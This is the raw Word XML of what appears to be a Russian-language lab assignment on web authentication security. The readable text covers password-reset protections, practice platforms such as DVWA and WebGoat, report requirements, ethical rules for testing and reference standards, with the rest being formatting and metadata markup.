    <w:p w14:paraId="090B4FFE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Корректная инвалидация сессии при logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1208763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3. Защита восстановления пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC565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Использование одноразовых токенов с ограниченным временем жизни</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378A46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Отсутствие информации о существовании учетной записи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16475BE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Дополнительная верификация через email/SMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9E9DDD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Логирование всех попыток сброса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B1069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23515FEB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Лабораторная среда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D970B3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Рекомендуемые платформы для практики:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C52A97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OWASP WebGoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> - учебное приложение с уязвимостями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFB918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DVWA (Damn Vulnerable Web App)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> - уязвимый веб-приложение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CD08A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Burp Suite Community Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> - инструмент для тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B894408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OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t> - бесплатный сканер безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03B12A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54B04BF5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Отчет по работе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5EDC96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Отчет должен содержать:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74410D27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Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA286E0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Используемые инструменты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D4D5D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Описание тестовой среды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DCAB7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Результаты по каждому заданию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6B7D5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Обнаруженные уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008728B2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Доказательство концепции (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30DE9F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Скриншоты или логи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D96F2D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Рекомендации по исправлению</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058AE87E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Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D05E6C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2672C180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Этические соображения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B760C3E">
      <w:pPr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Тестирование проводить только на системах, где у вас есть письменное разрешение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC0579B">
      <w:pPr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Не использовать полученные знания для незаконных действий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED87CF">
      <w:pPr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Сообщать об обнаруженных уязвимостях владельцам систем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FFA60">
      <w:pPr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Следовать правилам ответственного раскрытия уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4F71C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</w:p>
    <w:p w14:paraId="4778DCE4">
      <w:p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/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>Дополнительные материалы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BEEA01">
      <w:pPr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OWASP Authentication Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123CD4D">
      <w:pPr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ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>OWASP Session Management Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587F1DF">
      <w:pPr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en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>RFC 6238 (TOTP: Time-Based One-Time Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56BBF9">
      <w:pPr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bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>NIST Special Publication 800-63B (Digital Identity Guidelines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E29D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F77938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</w:p>
    <w:p w14:paraId="5D3AF0FB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId3" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="851" w:bottom="1134" w:left="1701" w:header="709" w:footer="709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  <w:embedRegular r:id="rId1" w:fontKey="{4149D101-B596-994D-230D-336903C80E05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86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0000AFF" w:usb1="40007843" w:usb2="00000001" w:usb3="00000000" w:csb0="400001BF" w:csb1="DFF70000"/>
    <w:embedRegular r:id="rId2" w:fontKey="{4F3B0247-4892-4512-230D-3369DCAD4821}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Georgia">
    <w:panose1 w:val="02040502050405090303"/>
    <w:charset w:val="CC"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F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3" w:fontKey="{3F5329DE-B554-F5FA-230D-33690A275780}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4" w:fontKey="{0557B28B-BD1C-0ED0-230D-3369388C8BE2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E4629">
    <w:pPr>
      <w:pStyle w:val="10"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:pict>
        <v:shape id="_x0000_s1025" o:spid="_x0000_s1025" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:307.3pt;margin-top:815.7pt;height:13.1pt;width:9.0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1E7BFA3">
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:rPr>
                    <w:sz w:val="20"/>
                  </w:rPr>
                </w:pP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5153E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="125153E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15B61C41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15B61C4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1C2B5280"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C2B5280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236E6B63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="236E6B6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24C26E3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24C26E3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>
    <w:nsid w:val="2E9C4721"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E9C472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30E3391D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30E3391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>
    <w:nsid w:val="37F85872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37F8587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3B933692"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B93369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>
    <w:nsid w:val="45E81376"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45E8137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4CEE03C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CEE03C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4D0F6C7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D0F6C7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>
    <w:nsid w:val="4E1079F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E1079F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>
    <w:nsid w:val="4F31440E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F31440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4F43006A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F43006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">
    <w:nsid w:val="6FB25D4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FB25D4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6">
    <w:nsid w:val="73DB5924"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73DB592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">
    <w:nsid w:val="7DEC2DC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DEC2DC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14"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7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documentProtection w:enforcement="0"/>
  <w:defaultTabStop w:val="720"/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1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F94"/>
    <w:rsid w:val="000A0138"/>
    <w:rsid w:val="000E4578"/>
    <w:rsid w:val="00195BFC"/>
    <w:rsid w:val="001B7EE7"/>
    <w:rsid w:val="00260899"/>
    <w:rsid w:val="003631A4"/>
    <w:rsid w:val="00424605"/>
    <w:rsid w:val="004843D5"/>
    <w:rsid w:val="004A73DD"/>
    <w:rsid w:val="00530F21"/>
    <w:rsid w:val="00625214"/>
    <w:rsid w:val="00780621"/>
    <w:rsid w:val="00A25D19"/>
    <w:rsid w:val="00BB4F94"/>
    <w:rsid w:val="00C26EA4"/>
    <w:rsid w:val="00C30D4C"/>
    <w:rsid w:val="00CA101B"/>
    <w:rsid w:val="00CD36A4"/>
    <w:rsid w:val="00E00A5E"/>
    <w:rsid w:val="00E47E0D"/>
    <w:rsid w:val="00FA7793"/>
    <w:rsid w:val="757B15D9"/>
    <w:rsid w:val="7EF31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ourier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New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Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru" w:eastAsia="ru-RU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link w:val="38"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link w:val="31"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link w:val="32"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9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link w:val="24"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="30"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="29"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="36"/>
    <w:semiHidden/>
    <w:unhideWhenUsed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eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15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6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17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18">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="9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9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20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21">
    <w:name w:val="Основной текст (3)_"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="0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3)"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="ru" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="23">
    <w:name w:val="Table Normal1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="2"/>
    <w:pPr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4">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="25">
    <w:name w:val="Заголовок 11"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="113" w:firstLine="454"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="Заголовок 21"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="567"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:lang w:val="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="27">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="827" w:hanging="260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paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="105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character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="12"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="msonormal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paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="ds-markdown-paragraph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character" w:customStyle="1" w:styleId="35">
    <w:name w:val="d813de27"/>
    <w:basedOn w:val="8"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="14"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="token"/>
    <w:basedOn w:val="8"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="8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tyleName="APA" SelectedStyle="\APASixthEditionOfficeOnline.xsl" Version="6"/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8243BB7-228F-47FF-B811-926ED191BA53}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3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24</Pages>
  <Words>5295</Words>
  <Characters>30188</Characters>
  <Lines>251</Lines>
  <Paragraphs>70</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>35413</CharactersWithSpaces>
  <Application>WPS Office_12.1.23152.23152_F1E327BC-269C-435d-A152-05C5408002CA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2025-11-30T19:44:00Z</dcterms:created>
  <dc:creator>Pentium</dc:creator>
  <cp:lastModifiedBy>Ксения Татарникова</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T23:49:39Z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BA330BC03AB5655FE70933695D2E2BED_42</vt:lpwstr>
  </property>
</Properties>
</file>